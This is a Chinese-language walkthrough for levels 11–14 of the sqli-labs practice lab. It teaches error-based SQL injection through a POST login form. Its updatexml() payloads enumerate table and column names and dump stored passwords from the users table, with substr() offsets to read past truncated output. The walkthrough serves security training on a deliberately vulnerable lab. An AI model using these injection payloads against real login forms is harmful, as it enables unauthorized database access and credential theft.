sqli-labs 11~14 多命通关攻略(报错注入)
sqli-labs 11~14 多命通关攻略(报错注入)
- 描述
- 判断注入类型
- 返回结果
- 错误输入
- 总结
- 符号
- 注释
- 判断返回结果中的列数
- 判断返回结果中的列数为 1
- 判断返回结果中的列数为 2
- 报错注入
- 通过报错注入爆破数据库中的表名
- 通过报错注入爆破数据库中的表名(逻辑或)
- 通过报错注入爆破表 users 中的列名
- 偏移
- 第一次偏移
- 第二次偏移
- 第三次偏移
- 整合
- 通过报错注入爆破表中的字段 password
- 第十二关
- 第十三关
- 第十四关
描述
| 项目 | 描述 |
|---|---|
| 操作系统 | Windows 10 专业版 |
| MySQL 版本 | MySQL 5.7.40 |
| Apache 版本 | Apache 2.2.39 |
判断注入类型
返回结果
错误输入
- 请在 username 输入框中输入如下内容并点击 Submit。
"
返回结果:
- 请在 username 输入框中输入如下内容并点击 Submit。
'
返回结果:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘’‘’ and password=‘’ LIMIT 0,1’ at line 1
存在错误返回信息,由错误信息我们可以推断该注入点存在 单引号字符型注入。
总结
由于该关卡中会提示错误信息,所以我们可以通过报错注入来爆破数据库。
符号
由于该关卡需要通过 POST 请求来提交数据,所以我们不能像前面的关卡那样在 URL 中添加数据以通过构造 URL 来提交数据,所以也就不存在与 URL 相关的问题。
注释
- #
在输入框中,我们可以使用 # 来对 SQL 语句进行注释,点击 Submit 提交按钮将发送 POST 请求。所以此处的 # 并不会具有 # 直接出现在 URL 中的 锚点 的语义,可以直接使用而不用人为进行 URL 编码去除语义(在 URL 中需要通过使用 %23 来去除 # 在 URL 中的语义以正常使用 #)。
- --
使用该注释符号时,-- 后必须要存在空格才能生效,发挥注释功能。在以往进行 GET 请求提交数据时,我们习惯在 -- 后添加 + 来添加空格使该注释符号生效(在 URL 中,+ 与空格等价)。但在该关卡中,我们需要填写 HTML 表单并通过 POST 进行数据提交,因此 + 并不具有在 URL 中 空格 的语义。
输入框在提交数据(账号密码)时,往往会去除提交内容中头尾的空白字符(本关没有进行该处理,所以我们可以直接使用 "-- " 来对数据),所以我们可以使用 “-- char” 来进行绕过。
判断返回结果中的列数
判断返回结果中的列数为 1
请在 username 输入框中输入如下内容并点击 Submit。
1' order by 2-- q
回显区域中未显示任何内容
判断返回结果中的列数为 2
请在 username 输入框中输入如下内容并点击 Submit。
1' order by 3-- q
返回结果:
Unknown column ‘3’ in ‘order clause’
由于在使用该语句出现了报错信息,所以可以判断返回结果中的列数为 2。
报错注入
通过报错注入爆破数据库中的表名
请在 username 输入框中输入如下内容并点击 Submit。
' union select 1, updatexml(1, concat(0x7e, (select group_concat(table_name) from information_schema.tables where table_schema = database()), 0x7e), 1)#
返回结果:
XPATH syntax error: ‘~emails,referers,uagents,users~’
通过报错注入爆破数据库中的表名(逻辑或)
其实在前面我们可以不 判断返回结果中的列数 这一步操作的,我们可以通过逻辑或运算符 or 达到同样的效果。
请在 username 输入框中输入如下内容并点击 Submit。
' or updatexml(1, concat(0x7e, (select group_concat(table_name) from information_schema.tables where table_schema = database()), 0x7e), 1)#
请记住 慢即是快,少即是多。在练习过程中,我们可以多尝试使用更繁琐的操作来解决一件问题,这样往往可以在需要时使用更快捷的操作来将这件问题解决。
通过报错注入爆破表 users 中的列名
请在 username 输入框中输入如下内容并点击 Submit。
' union select 1, updatexml(1, concat(0x7e, (select group_concat(column_name) from information_schema.columns where table_name = 'users'), 0x7e), 1)#
返回结果:
XPATH syntax error: ‘~USER,CURRENT_CONNECTIONS,TOTAL_’
可以看到返回结果缺少(右边)我们通过 concat() 函数拼接的字符 ~。所以我们可以推断返回的结果由于网页设计的原因而显示不全。
偏移
我们将使用 substr() 截取函数来达到 “移动回显区域中文字的效果”。
第一次偏移
请在 username 输入框中输入如下内容并点击 Submit。
' union select 1, updatexml(1, substr(concat(0x7e, (select group_concat(column_name) from information_schema.columns where table_name = 'users'), 0x7e), 16, 32), 1)#
返回结果:
XPATH syntax error: ‘,TOTAL_CONNECTIONS,id,’
第二次偏移
请在 username 输入框中输入如下内容并点击 Submit。
' union select 1, updatexml(1, substr(concat(0x7e, (select group_concat(column_name) from information_schema.columns where table_name = 'users'), 0x7e), 32, 32), 1)#
返回结果:
XPATH syntax error: ‘,id,username,passwor’
第三次偏移
请在 username 输入框中输入如下内容并点击 Submit。
' union select 1, updatexml(1, substr(concat(0x7e, (select group_concat(column_name) from information_schema.columns where table_name = 'users'), 0x7e), 48, 32), 1)#
返回结果:
XPATH syntax error: ‘,password~’
看到返回结果最右端的字符 ~,我们的偏移工作就已经完成了,接下来我们将对多次返回的结果进行整合。
整合
将多次偏移的结果及最开始得到的部分返回结果进行整合,我们可以得到完整的返回结果为:
XPATH syntax error: ‘~USER,CURRENT_CONNECTIONS,TOTAL_CONNECTIONS,id,username,password~’
通过报错注入爆破表中的字段 password
请在 username 输入框中输入如下内容并点击 Submit。
' union select 1, updatexml(1, concat(0x7e, (select group_concat(password) from users), 0x7e), 1)-- q
返回结果:
XPATH syntax error: ‘~Dumb,I-kill-you,p@ssword,crappy’
可以看到返回结果缺少(右边)我们通过 concat() 函数拼接的字符 ~。所以我们可以推断返回的结果由于网页设计的原因而显示不全。
偏移及整合的操作在前面已经示范,所以此处获得完整的返回结果的任务就交给勤劳的各位了。
第十二关
请在 username 输入框中输入如下内容并点击 Submit。
"
返回结果:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘“”“) and password=(”") LIMIT 0,1’ at line 1
该关卡仅在闭合方式上与第十一关有所区别。在这一关中,我们需要正确闭合 ("。
第十三关
请在 username 输入框中输入如下内容并点击 Submit。
'
返回结果:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘’‘’) and password=(‘’) LIMIT 0,1’ at line 1
该关卡仅在闭合方式上与第十一关有所区别。在这一关中,我们需要正确闭合 ('。
第十四关
请在 username 输入框中输入如下内容并点击 Submit。
"
返回结果:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘“”" and password=“” LIMIT 0,1’ at line 1
该关卡仅在闭合方式上与第十一关有所区别。在这一关中,我们需要正确闭合 "。